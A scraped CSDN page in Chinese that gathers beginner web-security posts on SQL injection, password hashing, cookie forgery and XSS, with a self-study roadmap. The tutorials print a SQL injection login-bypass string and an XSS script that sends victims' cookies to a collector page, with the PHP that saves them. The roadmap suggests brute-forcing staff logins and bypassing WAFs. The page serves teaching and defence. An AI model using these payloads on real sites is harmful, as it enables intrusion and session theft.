web安全_web安全入门 - CSDN
web安全 订阅
随着Web2.0、社交网络、微博等等一系列新型的互联网产品的诞生,基于Web环境的互联网应用越来越广泛,企业信息化的过程中各种应用都架设在Web平台上,Web业务的迅速发展也引起黑客们的强烈关注,接踵而至的就是Web安全威胁的凸显,黑客利用网站操作系统的漏洞和Web服务程序的SQL注入漏洞等得到Web服务器的控制权限,轻则篡改网页内容,重则窃取重要内部数据,更为严重的则是在网页中植入恶意代码,使得网站访问者受到侵害。 展开全文
随着Web2.0、社交网络、微博等等一系列新型的互联网产品的诞生,基于Web环境的互联网应用越来越广泛,企业信息化的过程中各种应用都架设在Web平台上,Web业务的迅速发展也引起黑客们的强烈关注,接踵而至的就是Web安全威胁的凸显,黑客利用网站操作系统的漏洞和Web服务程序的SQL注入漏洞等得到Web服务器的控制权限,轻则篡改网页内容,重则窃取重要内部数据,更为严重的则是在网页中植入恶意代码,使得网站访问者受到侵害。
信息
攻击种类
SQL注入
定    义
保证Web环境安全,为新型互联网产品提供安全平台
中文名
Web安全
现状原因
目前很多业务都依赖于互联网
Web安全定义
随着Web2.0、社交网络、微博等等一系列新型的互联网产品的诞生,基于Web环境的互联网应用越来越广泛,企业信息化的过程中各种应用都架设在Web平台上,Web业务的迅速发展也引起黑客们的强烈关注,接踵而至的就是Web安全威胁的凸显,黑客利用网站操作系统的漏洞和Web服务程序的SQL注入漏洞等得到Web服务器的控制权限,轻则篡改网页内容,重则窃取重要内部数据,更为严重的则是在网页中植入恶意代码,使得网站访问者受到侵害。这也使得越来越多的用户关注应用层的安全问题,对Web应用安全的关注度也逐渐升温。
收起全文
精华内容
参与话题
  • Web安全知识体系总结

    千次阅读 2019-02-09 01:08:13
    一、了解web安全 我们平时开发一般注重功能技术,而忽略了安全架构,对于怎么开发出一个安全的web项目,我认为有必要做一个学习与总结。 对于web安全,主要分为两大特性: ①私密性:数据不会被非法获取和利用,...

    一、了解web安全

    我们平时开发一般注重功能技术,而忽略了安全架构,对于怎么开发出一个安全的web项目,我认为有必要做一个学习与总结。

    对于web安全,主要分为两大特性:

    ①私密性:数据不会被非法获取和利用,一般经过授权才可以访问。  

     ②可靠性:数据不会丢失、损坏、篡改

     

    对于安全问题,一般关注三个层面:①代码层面    ②架构层面   ③运维层面

     

    二、常见的安全问题

    ①用户身份是否被盗用(是否真的是用户自己做的操作?)

    ②用户的密码是否安全(用户的密码是否泄露了呢?)

    ③用户的资料是否安全(用户资料是否会被盗取?如用户的手机号、身份证号、邮箱账号等资料)

    ④网站的数据库是否泄露

     

    具体web安全攻防技术

    ①跨站脚本攻击XSS

    ②跨站请求伪造攻击CSRF

    ③前端Cookies的安全性(熟悉Cookie特性与安全性)

    ④点击劫持(利用用户身份,在用户不知情情况下,完成某些操作的一种攻击手段)

    ⑤传输过程的安全性问题(前后端交互过程是否被窃听、数据是否被篡改等等)

    ⑥用户密码安全性问题(在系统设计时候,如果保证用户密码的安全性)

    ⑦SQL注入攻击(在进行数据库查询时候,如何避免SQL注入攻击,保证网站用户的数据安全)

    ⑧信息泄露与社会工程学(了解信息泄露的渠道及信息一般会被如何利用)

     

    未完待续......

    展开全文
  • web安全(入门篇)

    万次阅读 多人点赞 2016-07-25 16:48:29
    web安全的概念太过于宽泛,博主自知了解的并不多,还需要继续学习。但是又想给今天的学习进行总结,所以今天特分享一篇关于web安全的文章,希望对初次遇到web安全问题的同学提供帮助。SQL注入 数据库表出现场景 当...

    web安全的概念太过于宽泛,博主自知了解的并不多,还需要继续学习。但是又想给今天的学习进行总结,所以今天特分享一篇关于web安全的文章,希望对初次遇到web安全问题的同学提供帮助。


    SQL注入

    • 数据库表

    这里写图片描述

    • 出现场景

    当开发登录模块的时候,如果我们使用是mysql操作php,并非使用mysqliPDO等;当查询用户是否存在的SQL是这样写的,select * from user where name = 'admin' and password = '123456'; 这样写是以查询来的,但是会出现漏洞。居心叵测的人就可以使用万能密码xxx ' or 1 # 来破解上面的登录操作。

    • SQL注入原理

    用户在输入用户名的时候直接输入万能密码:xxx' or 1 #,那么最后拼接的SQL会变为:select * from user where name = 'xxx' or 1 # and password = '123456'; #符号代表SQL语法中的注释,上面的SQL就如同select * from user where name = 'xxx' or 1 。这样是可以查询到用户信息的,所以用户就登录了系统。

    • 如何防范

    1、过滤非法字符:保证传来的字符串作为一个参数,而不是语句拼接的一部分。所以需要对特殊字符进行转义,可以使用addslashes函数,我们可以给$_GET、$_POST、$_COOKIE等几个数组进行转义。下面我给大家封装了一个方法,递归给数组中带特殊字符的元素进行转义。

    封装函数

    <?php
    /**
     * 给数组中的特殊字符进行转义
     * @param arr $arr 转义前的数组
     * @return arr 转义后的数组
     */
    function _addslashes($arr){
        foreach ($arr as $k => $v) {
            if(is_string($v)){
                $arr[$k] = addslashes($v);
            }else if(is_array($v)){
                $arr[$k] = _addslashes($v);
            }
        }
        return $arr;
    }
    ?>

    其次,在初始化文件中,使用以下代码

    <?php
    //给get、post、cookie中的内容进行转义
    $_GET = _addslashes($_GET);
    $_POST = _addslashes($_POST);
    $_COOKIE = _addslashes($_COOKIE);
    ?>

    2、确保正确的数据类型:判断url或表单中传来的数据是否为想要的数据类型,如果不是,进行相应的数据类型转换。如使用方法intval() 提取变量中的整数值;如果参数错误,可以提示用户非法操作!

    3、使用正则表达式:设置用户的输入规则,限制用户不安规则瞎输

    4、使用预处理而不是拼接SQL语句:在上文我说过,使用mysql操作数据库会出现漏洞,避免出现这样的问题,可以使用mysqli、PDO来操作数据库。因为它们两都是将SQL预处理的,然后放入参数。

    prepare st1 from 'select * from user where name=? and password=?';//首先定义sql模板
    set @a="admin' or 1 #";//设置参数1
    set @b='123456';//设置参数2
    execute st1 using @a,@b;//执行sql

    密码安全

    • 场景

    假如某网站数据库泄露,那么用户信息就被一览无余了,如果这是用户的常用密码,那么坏人拿到密码就可以进行撞库操作,那么你买的12306的票就会被坏人退了。以前csdn和天涯就是使用明文来存储密码的,之后就出现的泄露事件。

    • md5加密

    md5是一种加密算法,是不可逆的算法。我们可以将密码使用md5加密后进行存储。那么在判断的时候,需要将用户输入的数据加密再和表中的数据相对比。

    注:在php和mysql中都有md5函数。

    • md5的不安全性

    上文说了要采用md5加密,怎么又不安全。网上有网站是在线md5解密的,他们是怎么解密的呢?因为他们一直在收集简单密码的md5值,形成越来越大的库。所以,如果密码是简单的纯数字,那么生成的md5值可能会被该网站解密。所以我们应该尽量把密码设置得难一些。

    • md5加盐

    什么是md5加盐?在存储密码的时候,我们可以将真实的密码+“盐”之后再进行md5加密。“盐”可以是一个字符串(无规律),也可以是一个字段,比如说是姓名字段,也可是是单独的字段。
    在判断用户是否存在的时候,我们先将输入的密码+“盐”,然后md5加密,在和数据库中的密码字段进行匹配。这样做会安全一些。


    cookie安全

    • 场景

    在某网站中,如果用户登录之后,如果使用的是cookie来存储用户的信息,然后是通过检测是否有这个cookie值来检测是否登录的。那么可能会出现cookie的安全问题。

    • 出现的原因

    这里写图片描述

    <?php
    /**
     * 判断用户是否登录
     * @return bool 是否登录
     */
    function isLogin(){
        return isset($_COOKIE['name']);
    }
    ?>

    这里写图片描述

    当用户登录以后,在浏览器中会出现cookie的值,形如上图,cookie的键是name,值是admin。如果网站是根据是否有这个cookie值来检测,形如上面代码,那么坏人就可以使用火狐浏览器中的firebug工具来伪造cookie,如上图。我只是伪造了一个cookie,名称也是name,但是内容我却可以随便输入,此时便会伪造一个cookie,那么以后带着这个cookie去访问的时候其他页面是,就不会被代码拦截了。

    • 解决方式

    在登录成功时,除了只设置name项之外,我们可以多设置一项,但是这一项的值必须是随机的,没有任何规律可循的。下面的代码我是先定义了一个盐的变量,然后把登录后的用户名+盐的方式再进行md5加密,再定义一个cookie项。然后修改判断用户是否登录的代码。

    <?php
    $salt = "ioujijasdf/,.[?";
    setcookie('name',$user['name']);
    setcookie('cookiecode',md5($user['name'].'|'.$salt));
    >?
    <?php
    /**
     * 加密用户名
     * @param str $name 用户名
     * @return str 加密之后的用户名
     */
    function cCode($name){
        $salt = require(ROOT.'/lib/config.php');
        return md5($name.'|'.$salt['salt']);
    }
    /**
     * 判断用户是否登录
     * @return bool 是否登录
     */
    function isLogin(){
        if(!isset($_COOKIE['name']) || !isset($_COOKIE['cookiecode'])){
            return false;
        }
        return $_COOKIE['cookiecode'] === cCode($_COOKIE['name']);
    }
    ?>
    

    xss攻击

    • 案列
      在从事项目开发中,经常会碰到评论功能,如果我们将评论的内容直接存到表中,那么显示的时候就可能被用户输入的东西进行攻击。

    1、恶作剧:

    <font size="100" color="red">逗你玩</font>

    这里写图片描述

    2、略带恶意:
    这样就会无限的弹出对话框了,这个网站就挂了,除非把改评论删除

    <script>
    while(true) {
    alert('欢迎你');
    } 
    </script>

    3、恶意
    读取你的cookie信息,并发送到指定的页面,进行保存操作。

    获取cookie的信息

    <script>
    alert(document.cookie);
    </script>

    这里写图片描述

    评论的内容

    <script>
    var url = "http://localhost//toucookie.php?cookie=" + document.cookie;
    var img = document.createElement("img");
    img.src = url;
    document.appendChild(url);
    </script>

    toucookie.php中的内容

    <?php
    /**
     * 保存传过来的cookie信息
     */
    file_put_contents('./cookie.txt', $_GET['cookie'],FILE_APPEND);
    ?>

    cookie.txt的内容

    name=admin; cookiecode=6db8034dfdeb453362f50154ee6fa45d
    • 防范xss

    1、不需要展示HTML标签的表单内容,入库时直接转成实体显示

    $_POST['content] = htmlspecialchars($_POST['content']);

    2、可以用正则检测输入框必须为email等合法数据

    3、需要展示HTML标签的部分, 仅允许展示有限的标签,如p,a,img等
    strip_tags 来过滤html标签

    4、需要展示HTML标签的部分, 仅允许展示有限的标签,如p,a,img等
    如strip_tags 来过滤html标签

    展开全文
  • 如何自学web安全(详细路径)

    万次阅读 多人点赞 2018-03-05 01:06:22
    直入主题,不要嫌墨迹,看完对你有帮助web基础知识web安全,意为web的安全,web即万维网,是由超文本和HTTP构造,就是我们常说的网站那么要学习web安全,必要先要了解web的知识,不然何谈渗透,网站是由程序,空间,...

    直入主题,不要嫌墨迹,看完对你有帮助

    web基础知识

    web安全,意为web的安全,web即万维网,是由超文本和HTTP构造,就是我们常说的网站
    那么要学习web安全,必要先要了解web的知识,不然何谈渗透,网站是由程序,空间,域名三大部分组成
    我们渗透的目标一般就是网站的程序,能编写网站的编程语言非常多,然而最最适合我们的还是PHP它的优点在于:入门学习时间短快速开发,可以说非常的适合我们的学习

    以下是推荐教程
    PHP:链接: https://pan.baidu.com/s/1kWPYl0N 密码: 38ha
    燕大师的HTTP协议:链接: https://pan.baidu.com/s/1smm6ujN 密码: 3m56
    燕大师的MySQL:链接: https://pan.baidu.com/s/1pMU9JHx 密码: 582w(我看过最好的一个)

    安全初识

    有了web的基础,在学习安全事半功倍,在学习之前我要说一下学习的方式方法。
    一、明确阶段性目标
    二、模仿借鉴
    三、实践总结

    一、目前阶段性目标

    在学习了一个“漏洞”之后,要了解其底层产生原理,即代码的问题是如何发生的,然后有什么方法可以防御这个漏洞的产生

    二、模仿借鉴

    通过视频教程,只能简单的学习一个漏洞的利用,在实际中,不会让本地演示的那么简单,还可能有waf,所以要通过搜索引擎,各大安全网站上找相关的文章来学习,了解文章中所说的问题,并自己写出问题的代码,找出防御的方法。当然我们主要是绕过waf

    三、实践总结

    现在你已经算是小有成就了,但需要多加实践(有人可能会说找不到实践的目标,建议学习一下google hack语法)
    也可以在各大漏洞平台(SRC)进行挖洞之旅,当然别忘了做总结,推荐写博客,或者写文章到i春秋这样的大型网站

    推荐视频
    链接: https://pan.baidu.com/s/1ggNy4YR 密码: 74wm
    链接: https://pan.baidu.com/s/1c4hNxj6 密码: mq2n

    长远目标

    想要有出色的技术,就要更深入的了解web
    首先是“Python”可以帮助我编写自动化工具,在渗透中也是非常重要,举个例子
    比如校园网站,一般都会有一个页面上有各科老师的姓名,这个适合我们可以把这些姓名拷贝下来转换成拼音,然后在教师登录处爆破,但是很多时候回有几十人,总不能都一个拷贝,自己拼出来吧,那样会累死的!
    链接: https://pan.baidu.com/s/1dFTXTUL 密码: bdcc

    其次是JAVA,要知道大型网站大部分都是java开发的,学习java可以帮助我们更好的了解网站的架构,同样它的网络编程也是非常强大,如果你不会python也同样可以使用java编写各种渗透工具
    链接: https://pan.baidu.com/s/1ggedoXX 密码: k774


    展开全文
  • 根据机构调研,目前安全问题80%都发生在WEB安全层面上,但是往往企业中只有20%的防护成本运用到web安全上。 本课程中,从web安全漏洞原理、攻击手段、测试方法、预防措施四个方面全面剖析WEB安全的点点滴滴,针对...
  • 我的安全之路——Web安全

    万次阅读 多人点赞 2020-07-24 11:00:13
    write in my dormitory at ‏‎9:47:05 Friday, April 7, 2017 by giantbranch(一个当初想横跨web跟二进制的菜鸡)————致即将毕业的自己。这是我的安全之路系列第一篇,敬请期待第二篇:《我的安全之路——二...

    write in my dormitory at ‏‎9:47:05 Friday, April 7, 2017 by giantbranch(其实当初想横跨web跟二进制的)

    ————致即将毕业的自己。

    这是我的安全之路系列第一篇,敬请期待第二篇:《我的安全之路——二进制与逆向篇》

    总览

    大一:基本都在学习学校的课程,C语言,C++,高数啊,不过分数还可以,在大一复习周还在php3小时光速入门呢

    大二:web开发,大概在下学期5月份这样子开始web安全

    大三:开始去参加比赛,刷题,学习各种ctf需要的知识,后期也接触了逆向

    大四:继续学习二进制知识,分析各种漏洞,当然也有搞web,还参加世安杯,蓝盾杯总决赛,铁三数据赛

    前情回顾

    我并没有像别人那样小学初中或者高中就已经在搞安全,那时候我们都在应试教育,或者沉迷游戏不能自拔吧,初高中我也是沉迷游戏,那时候也中病毒什么的,最多也会搞个360杀杀毒,重装系统什么的,自从有了第一次重装系统,之后一言不合就重装系统,其实当时也想过别人是怎么入侵电脑,入侵网站的,不过可能是环境和机遇的原因没有走上这条路。

    后来高考要选专业了,其实当时是一心想考个好分数,也没考虑过选个什么专业,再过几天就要选专业了才去考虑的,选专业当然要自己喜欢的,我左思右想,我小时候不是很喜欢拆解各种小电器吗,也许对硬件会感兴趣,第一志愿报了电子科学与技术(而且后面的有网络工程啥的,就是没有信息安全),最后由于分数没够,没能去到那专业,由于是服从分配,分配到了有点关联的专业——信息安全专业,其实来之前对这个专业基本没多少了解的。

    Web开发之路

    到了大学也不是一上来就沉迷信息安全学习,不能自拔,因为其实我们一开始跟软工上的课都是一样的,那就老老实实学C语言,高数,什么的。那又是如何接触到Web的呢,那是因为加入了计算机协会,其实在我们这组织并不是很厉害,只不过是当时有个活动是给协会会员讲课,我选择去讲网页开发,当时找了个Dreamweaver开发网页的教程,可以说是可视化的Web开发,非常的简单,从此就走上Web的坑咯。

    其实大一还加入了电脑义修队,哈哈,一言不合就重装电脑,在大一快结束的时候被另一义修队员拉到一个校园微信公众号的一个团队去搞微信开发去了,自此走上web开发之路。什么查天气,发定位测距离就是入门的一些小实例,挺好玩的。之后在公众号里面开发了查校园网上网参数,失物招领,基于WeCenter的微信问答系统等。

    这公众号凭借着师兄开发的查电费功能迅速“走红”,学校某个部门领导就发现了我们这个技术团队,所以后来就给这个部门开发了3个web,我写后台,当时主要是为了学习,也没用什么框架,确实也是学到了东西。

    但是由于没用框架,当时无论是教程还是自己都是没有安全意识,触发了一个重大事件——自己开发的web网站被人报wooyun了。其实就是新手开发网站存在最经典的问题,我的问题存在于新闻详情页存在sql注入,更加坑爹的就是使用root连接的数据库,服务器直接被拿下咯。除此之外,还有明文储存密码。

    web开发陆陆续续干了一年,对接下来的web安全之路的作用无疑非常巨大,可以说是web安全之路的“催化剂”。

    Web安全之路

    由于那次入侵,我就尝试根据WooYun提交的报告,复现了一次报告者的入侵过程,收益良多。

    况且由于我的专业是信息安全,由此踏上了Web安全之路。

    之后在合天网安实验室“疯狂”做实验(那时候i春秋还没出来呢),还申请当了内测人员(新出的实验免费做,不过要写评价,还有实验中存在的问题等),之后邀请了合天网实验室来了一次见面会(http://www.hetianlab.com/html/news/Geek-jnu.html),之后还搞了个合粉俱乐部,再之后就向合天投稿了一个实验(http://www.hetianlab.com/expc.do?ec=ECID9d6c0ca797abec2016092116115600001)从而成为了一位实验设计师了。

    其实最重要的就是参加比赛,一有机会就报名参加,每次都是我们3个人报名,我们3个随便谁一看到有比赛,就马上相互提醒要报名,不管题目难不难,至少也得看一下,不行就赛后看一下writeup咯。

    之后就边比赛,边刷CTF的题,还有安排其他一些知识点的深入学习,比如sql注入,xss等漏洞的学习,也深入python的编程。

    还有的话就是我也是买了很多书的,看的web安全的书也是比较多了,看了一些后就没看了,主要是看了之后发现这个知道,直接翻到下一页了,一下就看完了。

    其实还有一个就是参加了学习的开放实验,那时是metasploit和XSS,两个实验可以选,都是要自学,跟着做出点成绩来,后来我就设计了个逆向与二进制初探的一个开放实验指导给老师,师弟师妹你们有福了。

    其实很难具体讲清楚,看我的博客就知道我大概的学习轨迹了。

    **但是!!!**每个人都不一样,学习资源日新月异,知识也会更新,以上提供的仅作为参考,希望你走出更加牛逼的自己

    展开全文
  • 浅谈web前端安全

    千次阅读 2017-11-30 18:06:17
    单纯地在你的客户端弹出信息只是类似于迫使你在自己的房间脱衣服...如同标题所写的,今天要聊的是WEB安全机制,但这“前端”二字倒是说的狭义了些,安全的问题大部分还是更依赖于后端的过滤和拦截措施,后端的朋友如果
  • web安全是指什么

    千次阅读 2018-01-24 17:33:19
    主要指两个方面 私密性 不被非法获取和利用。 ...web安全的重要性为什么这么高 直面用户,挑战严峻 网站和用户安全是生命线 安全事故威胁企业生产,口碑甚至生存 有哪些安全隐患 跨站脚本
  • Web安全概述

    千次阅读 2018-03-08 11:43:20
    与此同时,随着Web技术发展越来越成熟,而非Web服务(如Windows操作系统)越来越少的暴露在互联网上,现在互联网安全主要指的是Web安全。既然要讲Web安全,首先介绍什么是安全,安全的本质是什么?引用《白帽子讲...
  • web常见安全漏洞

    万次阅读 2018-09-08 10:07:40
    随着Web2.0、网络社交等一系列新型的互联网产品的诞生,基于Web环境的...Web业务的迅速发展吸引了黑客们的强烈关注,接踵而至的就是Web安全威胁的凸显。黑客利用网站操作系统的漏洞和Web服务程序的SQL注入漏洞...
  • 菜鸟浅谈——web安全测试

    万次阅读 多人点赞 2018-02-28 13:27:23
    本文仅为小白了解安全测试提供帮助 一:安全测试注意事项 1)要注意白帽子与黑客之间的区别 2)在挖漏洞挣外快时,注意不要使用安全扫描或暴力破解软件对上线网站进行扫描或攻击。 不要对上线网站造成破坏,不要...
  • Web开发常见安全问题及解决

    万次阅读 2018-05-22 22:36:38
    Web攻击动机:恶作剧;关闭Web站点,拒绝正常服务;篡改Web网页,损害企业名誉;免费浏览收费内容;盗窃用户隐私信息,例如Email;以用户身份登录执行非法操作,从而获取暴利;以此为跳板攻击企业内网其他系统;网页...
  • Web安全-渗透基础

    千次阅读 2019-03-06 14:53:02
    1、什么是同源策略 为了防止不同域在用户浏览器中彼此干扰,浏览器对从不同来源(域)收到的内容进行隔离。 浏览器不允许任何旧有脚本访问一个站点的cookie,否则,会话容易被劫持。 只有发布cookie的站点能够...
  • Web安全之浅析SQL注入

    2020-08-02 09:15:37
    SQL注入常见的Web安全问题之一,其形式主要是把SQL命令插入到Web表单提交或页面请求url的查询字符串,破坏原有SQL结构,最终达到欺骗服务器执行恶意的SQL命令。 原理 sql注入的原理是将sql代码伪装到输入参数中,...
  • 先来看几个出现安全问题的例子OWASP TOP10开发为什么要知道OWASP TOP10TOP1-注入TOP1-注入的示例TOP1-注入的防范TOP1-使用ESAPI(https://github.com/ESAPI/esapi-java-legacy)TOP2-失效的身份认证和会话管理TOP2-...
  • 类型“System.Web.WebPages.Razor.WebPageRazorHost”违反了继承安全性规则。派生类型必须与基类型的安全可访问性匹配或者比基类型的安全可访问性低。 说明: 执行当前 Web 请求期间,出现未经处理的异常。请检查...
  • 这个系列是拜读《Web安全攻防:渗透测试实战指南》之后的一些笔记和实践记录,感谢作者对我学习过程的帮助,这本书值得大家入手学习。 信息收集 1.获取真实IP 2.域名信息 1.Whois查询 Kali自带了Whois,但是...
  • 《黑客攻防技术宝典.Web实战篇(第 2版)》是探索和研究Web 应用程序安全漏洞的实践指南。作者利用大量的实际案例和示例代码,详细介绍了各类Web 应用程序的弱点,并深入阐述了如何针对Web 应用程序进行具体的渗透...
  • Web是互联网的核心,是未来云计算和移动互联网的最佳载体,因此Web安全也是互联网公司安全业务中最重要的组成部分。 下面来看看几种常见的web漏洞: 1.XSS跨站脚本攻击 XSS跨站脚本攻击,通常指黑客通过”HTML...
  • 一个程序员浅谈“如何Web安全

    万次阅读 2019-01-20 15:08:56
    文章已转移:https://blog.csdn.net/localhost01/article/details/86560345
  • 网页版微信登录异常 解决方法: 清理下当前浏览器的历史记录、缓存和cookie应该就可以了。
1 2 3 4 5 ... 20
收藏数 806,883
精华内容 322,753
关键字:

web安全